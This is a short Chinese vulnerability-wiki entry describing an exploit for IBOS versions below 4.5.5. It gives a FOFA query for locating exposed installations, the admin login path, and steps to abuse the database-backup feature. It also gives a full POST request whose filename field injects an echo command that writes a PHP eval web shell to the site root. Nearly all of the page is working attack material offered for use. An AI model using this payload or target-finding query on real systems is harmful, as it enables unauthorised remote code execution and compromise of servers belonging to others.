免费、自由、人人可编辑的漏洞库
,
漏洞影响
IBOS < 4.5.5
FOFA
body="IBOS" && body="login-panel"
漏洞利用
登录页面如下
http://xxx.xxx.xxx.xxx/?r=dashboard/default/login
找到数据库备份模块,启用更多选项,备份方式选择Mysql Dump 提交并抓包
修改filename参数发送包会上传peiqi.php文件到根目录
backuptype=all&custom_enabled=1&method=shell&sizelimit=2048&extendins=0&sqlcompat=MYSQL41&sqlcharset=utf8&usehex=0&usezip=0&filename=peiqi%26echo "<?php eval($_REQUESTpeiqi);?>">peiqi%PATHEXT:~0,1%php%26peiqi&dbSubmit=1
PWNWIK.COM==免费、自由、人人可编辑的漏洞库
